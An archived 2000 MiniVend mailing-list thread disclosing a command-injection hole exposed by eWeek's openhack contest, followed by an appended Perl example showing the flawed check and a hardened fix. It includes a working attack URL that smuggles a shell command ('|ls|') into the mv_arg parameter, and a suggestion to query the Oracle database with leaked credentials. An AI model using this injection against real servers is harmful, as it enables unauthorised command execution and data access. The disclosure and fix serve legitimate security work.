

RE: HACKED [mv] eWeek using Minivend in our openhack project



******    message to minivend-users from "Cameron B. Prince" <cbp@InternetExpertsLLC.com>     ******

I have duplicated this with a test v4.04 simple catalog.

I had not taken the time to explore the view_page.html file when I converted
my primary catalog from v3.14 to v4.04, so I removed it originally.

My questions to you all are:

1) It seems to be a problem that is specific to this default page. Can
someone confirm this?
2) Does this bug in util.pm open MiniVend to attacks in other functions?
3) Can we safeguard our catalogs by simply removing the file?
4) Are there other functions that rely on this page? I could find none when
I converted to v4.04 and I have seen none since.

I was pleased to hear of this contest because security is or should be a
major concern for all of us.

I hope Tim and the others will fix this hole and reset the counter so that
more can be sought.

Thanks for your dedication.


Cameron


-----Original Message-----
From: owner-minivend-users@minivend.com
[mailto:owner-minivend-users@minivend.com]On Behalf Of Alexander Lazic
Sent: Monday, July 03, 2000 3:33 AM
To: henry_baltazar@ziffdavis.com; timothy_dyck@ziffdavis.com
Cc: minivend-users@minivend.com; Timothy Dyck
Subject: Re: HACKED [mv] eWeek using Minivend in our openhack project

******    message to minivend-users from Alexander Lazic <all@gmx.at>     ******

hi,

> Since we are paying money if anyone can crack into the store ($1,500),
> it's possible that someone is going to go through the code looking for
> ways to exploit any holes. Other than the advice in the FAQ on "Is
> MiniVend secure" and in the "MiniVend Security" section of the manual, are
> there any other security tips people can provide to keep our site locked
> down? Thanks very much.

there is a security hole in the minivend Util.pm module

routine readfile at line 810:

--cut here---
return undef if ! open(READIN, $file);
--cut here---

... minivend file view_page.html:

---cut here---
[elsif session arg =~ /^\/|\.\./]
---cut here---

does no proper input validation check (they forgot about the "|" :)

these two problems allow an http request like:

https://www.openhack.com/cgi-bin/eweekorcl/view_page.html?mv_arg=|ls|

so anybody can execute "any" command with minivend's permissions ..

/* with the ORACLE_USERID=minivend/hugepassword@orcl and sqlplus it should
be easy to execute queries on the oracle database
 .. unfortunately the user minivend is not allowed to set
environment-variables .. due to lack of time we were not able to have a
closer look at this ... */

that's all

almei

--
Sent through GMX FreeMail - http://www.gmx.net

-
To unsubscribe from the list, DO NOT REPLY to this message.  Instead, send
email with 'UNSUBSCRIBE minivend-users' in the body to
Majordomo@minivend.com.
Archive of past messages: http://www.minivend.com/minivend/minivend-list
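As an added example (not code from MiniVend, eWeek, or either poster), the two pieces quoted in the thread side by side with a hardened form, in Perl: the view_page.html check `/^\/|\.\./`, which only rejects a leading "/" or a "..", and the two-argument `open()` from Util.pm, which lets Perl treat a leading or trailing "|" in the file name as a shell command. The function names, the allowlist pattern and the probe strings are assumptions made here for illustration; the vulnerable `readfile_unsafe` is included for comparison and is never called with a pipe in the demo.

```perl
#!/usr/bin/perl
# Added example, not MiniVend code. Shows why the page check and the
# two-argument open() combine into command execution, and a fix for each.
use strict;
use warnings;

# The check from view_page.html, as quoted in the thread:
#   [elsif session arg =~ /^\/|\.\./]
# It rejects a leading "/" or any "..", and nothing else (a blocklist).
sub arg_rejected_by_page {
    my ($arg) = @_;
    return $arg =~ /^\/|\.\./ ? 1 : 0;
}

# Hardened check (assumption: a page name is a single path component of
# word characters, dots and dashes). Positive allowlist, so "|" can never
# pass, and ".." is still refused inside the name.
sub arg_rejected_by_allowlist {
    my ($arg) = @_;
    return ($arg =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]*\z/ && $arg !~ /\.\./) ? 0 : 1;
}

# Shape of the Util.pm readfile quoted at line 810: a two-argument open.
# Perl reads a leading or trailing "|" in the name as "pipe to/from a
# shell command", so a name like "|ls|" runs a command instead of
# opening a file. Shown for comparison only; the demo never calls it
# with a pipe.
sub readfile_unsafe {
    my ($file) = @_;
    return undef if ! open(READIN, $file);
    local $/;
    my $data = <READIN>;
    close READIN;
    return $data;
}

# Hardened: three-argument open with an explicit "<" mode. The name is
# then taken literally, so "|ls|" is just a file that does not exist.
sub readfile_safe {
    my ($file) = @_;
    open(my $in, '<', $file) or return undef;
    local $/;
    my $data = <$in>;
    close $in;
    return $data;
}

# Constructed probes: a normal page name, two traversal attempts, and the
# pipe forms the thread describes.
my @probes = ('about.html', '../etc/passwd', '/etc/passwd', '|ls|', 'ls|');
for my $p (@probes) {
    printf "%-14s page-check: %s   allowlist: %s\n", $p,
        arg_rejected_by_page($p)      ? 'reject' : 'ACCEPT',
        arg_rejected_by_allowlist($p) ? 'reject' : 'ACCEPT';
}

# Even if a "|" slipped past validation, the three-argument open does not
# treat it as a command: this fails with "No such file or directory".
my $got = readfile_safe('|ls|');
print defined $got ? "opened something?!\n"
                   : "readfile_safe('|ls|') failed cleanly: $!\n";
```

Run it with `perl example.pl`: the page check accepts both `|ls|` and `ls|` (it was never looking for them), the allowlist rejects every probe except `about.html`, and the last line shows that with the three-argument `open` the pipe name is simply a missing file. Both fixes are worth applying together: the allowlist keeps hostile names out of the page, and the explicit mode makes `readfile` safe no matter which page calls it, which answers the question of whether other functions that reach `readfile` are exposed.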
